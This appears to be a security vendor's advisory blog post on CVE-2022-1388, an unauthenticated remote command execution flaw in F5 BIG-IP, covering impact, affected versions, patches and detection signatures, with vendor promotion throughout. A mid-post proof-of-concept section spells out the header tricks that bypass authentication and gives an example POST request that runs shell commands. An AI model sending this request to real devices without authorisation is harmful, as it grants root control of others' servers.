.svg)
.svg)
On May 18th, 2022, The Cybersecurity and Infrastructure Security Agency (CISA) and the Multi-State Information Sharing & Analysis Center (MS-ISAC) released a joint advisory on the remote code execution (CVE-2022-1388) vulnerability found in the F5 BIG-IP products [1]. When exploited, the CVE-2022-1388 vulnerability allows attackers to run arbitrary code and gain control of affected products.
Picus Labs has updated the Picus Threat Library with simulations for CVE-2022-1388 vulnerability exploitation attacks affecting F5 BIG-IP products.
Start simulating CVE-2022-1388 attacks with a 14-Day Free Trial of the Picus Platform
What Is the CVE-2022-1388 Vulnerability?
F5 Networks published information about the CVE-2022-1388 remote code execution vulnerability on May 4th, 2022 [2]. An unauthenticated adversary with network access may exploit CVE-2022-1388 vulnerability to execute arbitrary commands using the management port or self-IP address.
"/mgmt/tm/util/bash" service in F5 BIG-IP is a feature that allows users to run commands as the root user of the BIG-IP. The service does not require a password or authentication. Therefore, if adversaries have network access to affected F5 BIG-IP products, they can execute commands remotely with elevated privileges.
What Is the Impact of the CVE-2022-1388 Vulnerability?
48 of the Fortune 50 companies use F5 products. Due to its wide use, the exploitation of CVE-2022-1388 may have serious consequences. Since the vulnerability allows unauthenticated attackers to execute arbitrary code on F5 BIG-IP products, the CVSSv3 base score for CVE-2022-1388 is 9.8 Critical.
CVE-2022-1388 vulnerability enables remote code executions on systems running vulnerable F5 BIG-IP versions and allows the attacker complete control of the affected server. For example, attackers can exploit CVE-2022-1388 to run malicious codes and install webshells as backdoors on vulnerable systems for maintaining access and post-exploitation.
Which F5 BIG-IP Versions Are Affected?
Affected and fixed F5 BIG-IP versions are shown in the below table:
|
Affected Versions |
Fixed Version |
|
16.1.0 - 16.1.2 |
16.1.2.2 |
|
15.1.0 - 15.1.5 |
15.1.5.1 |
|
14.1.0 - 14.1.4 |
14.1.4.6 |
|
13.1.0 - 13.1.4 |
13.1.5 |
|
12.1.0 - 12.1.6 |
Not fixed - EOL |
|
11.6.1 - 11.6.5 |
Not fixed - EOL |
What Is the Current Situation?
F5 released a patch for affected products on May 4th, 2022, alongside the security advisory of the vulnerability. 17.x versions are not affected by the CVE-2022-1388 vulnerability. Since versions 12.1.x and 11.6.x are end-of-life (EOL), the patches are not available for these versions.
What Should You Do?
Since F5 BIG-IP is a widely used product and public proof-of-concept (PoC) codes for exploiting the CVE-2022-1388 vulnerability are available, the users are advised to patch their affected products without delay.
CVE-2022-1388 F5 BIG-IP PoC Exploit
The following conditions are required to exploit CVE-2022-1388 vulnerability:
- A POST request must be sent to the vulnerable endpoint, which is "/mgmt/tm/util/bash"
- X-F5-Auth-Token must be present as a header
- Example: X-F5-Auth-Token: 0
- The "Authorization" header must contain the "admin" username and any password.
- Example: Authorization: Basic YWRtaW46 YWRtaW46 is the Base64 encoded version of “admin:”, which means the username is "admin" and password is "" (empty), which is also valid.
- The "Connection" header must contain the "X-F5-Auth-Token" header field
- Example: Connection: X-F5-Auth-Token
- The "Host" header must be localhost / 127.0.0.1, or the "Connection" header must include "X-Forwarded-Host"
- Example: Connection: X-F5-Auth-Token, X-Forwarded-Host‘
- The value of the "command" parameter in the POST request must be "run"
- Example: "command": "run"
- The value of the "utilCmdArgs" parameter in the POST request must be a valid Linux command.
- Example: "utilCmdArgs": " -c 'whoami' "
Therefore, you can test your F5 BIG-IP devices against CVE-2022-1388 vulnerability exploitation attacks with the following POST request:
|
POST /mgmt/tm/util/bash HTTP/1.1 X-F5-Auth-Token: 0 Authorization: Basic YWRtaW46 X-Forwarded-For: localhost Content-Length: 0
|
Example Code: Proof of Concept POST request for CVE-2022-1388 exploit
How Picus Helps Simulate and Prevent CVE-2022-1388 F5 BIG-IP Remote Code Execution Exploits?
We also strongly suggest simulating CVE-2022-1388 vulnerability to test the effectiveness of your security controls like Web Application Firewalls (WAF), Intrusion Prevention Systems (IPS), and NGFW against F5 BIG-IP RCE attacks using the Picus’ The Complete Security Control Validation Platform. You can test your defenses against CVE-2022-1388 vulnerability and hundreds of commonly exploited vulnerabilities within minutes with a 14-day free trial of the Picus Platform.
Picus Threat Library includes the following threats for CVE-2022-1388 vulnerability:
|
Threat ID |
Threat Name |
|
97569 |
F5 Web Attack Campaign |
This threat in Picus Threat Library also includes the following actions for previous F5 BIG-IPvulnerabilities:
|
CVE |
Threat Name |
|
CVE-2020-5902 |
F5 BIG-IP Local File Inclusion (LFI) Vulnerability |
|
CVE-2020-5902 |
F5 BIG-IP Remote Code Execution (RCE) Vulnerability |
Moreover, Picus Threat Library contains 150+ threats containing 1500+ web application and vulnerability exploitation attacks in addition to 3500+ endpoint, malware, email, and data exfiltration threats as of today.
Picus also provides actionable mitigation content. Picus Mitigation Library includes prevention signatures to address CVE-2022-1388 F5 BIG-IP RCE and other vulnerability exploitation attacks in preventive security controls. Currently, Picus Labs validated the following signatures:
|
Security Control |
Signature ID |
Signature Name |
|
Cisco Firepower NGFW |
1.57336.3 |
POLICY-OTHER F5 iControl REST interface tm.util.bash invocation attempt |
|
Cisco Firepower NGFW |
1.59735.2 |
SERVER-WEBAPP F5 BIG-IP iControl remote code execution attempt |
|
Cisco SourceFire IPS |
1.57336.3 |
POLICY-OTHER F5 iControl REST interface tm.util.bash invocation attempt |
|
Cisco SourceFire IPS |
1.59735.2 |
SERVER-WEBAPP F5 BIG-IP iControl remote code execution attempt |
|
Citrix Web App Firewall |
999945 |
web-misc apache http server authentication bypass vulnerability in ap_get_basic_auth_pw() via basic authorization headers |
|
Forcepoint NGFW |
HTTP_CRL-F5-iControl-Rest-Unauthenticated-RCE-CVE-2022-1388 |
|
|
Forcepoint NGFW |
HTTP_CSH-Apache-HTTP-Server-Mod_rpaf-X-Forwarded-For-Denial-Of-Service |
|
|
Fortigate IPS |
51543 |
applications3: F5.BIG-IP.iControl.REST.Authentication.Bypass |
|
F5 BIG-IP ASM |
200013045 |
BIG-IP iControl REST Authentication Bypass (3) |
|
Snort IPS |
1.57336.1 |
POLICY-OTHER F5 iControl REST interface tm.util.bash invocation attempt |
|
Snort IPS |
1.59735.2 |
SERVER-WEBAPP F5 BIG-IP iControl remote code execution attempt |
|
Snort IPS |
1.57336.3 |
POLICY-OTHER F5 iControl REST interface tm.util.bash invocation attempt |
|
Trend Micro Tipping Point |
12639 |
HTTP: Apache HTTP Server X-Forwarded-For Denial-of-Service |
Start simulating emerging threats today and get actionable mitigation insights with a 14-day free trial of Picus’ The Complete Security Control Validation Platform.
